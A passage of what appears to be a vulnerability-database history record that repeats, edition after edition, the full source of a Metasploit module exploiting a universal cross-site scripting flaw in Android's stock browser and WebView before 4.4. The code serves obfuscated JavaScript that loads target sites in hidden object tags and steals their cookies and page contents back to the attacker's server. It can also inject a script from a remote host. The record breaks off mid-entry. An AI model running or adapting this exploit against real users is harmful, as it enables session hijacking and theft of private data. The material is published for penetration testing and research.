'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-02-26T10:53:29", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T13:08:11", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-12T13:08:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-12T13:08:11", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-12T15:15:57", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-12T15:15:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-12T15:15:57", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-18T03:49:23", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 6.8, "modified": "2018-03-18T03:49:23"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-18T03:49:23", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-18T05:43:00", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-18T05:43:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-18T05:43:00", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-19T21:53:22", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-19T21:53:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-03-19T21:53:22", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-03-19T23:46:10", "history": [], "viewCount": 55, "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "modified": "2018-03-19T23:46:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < 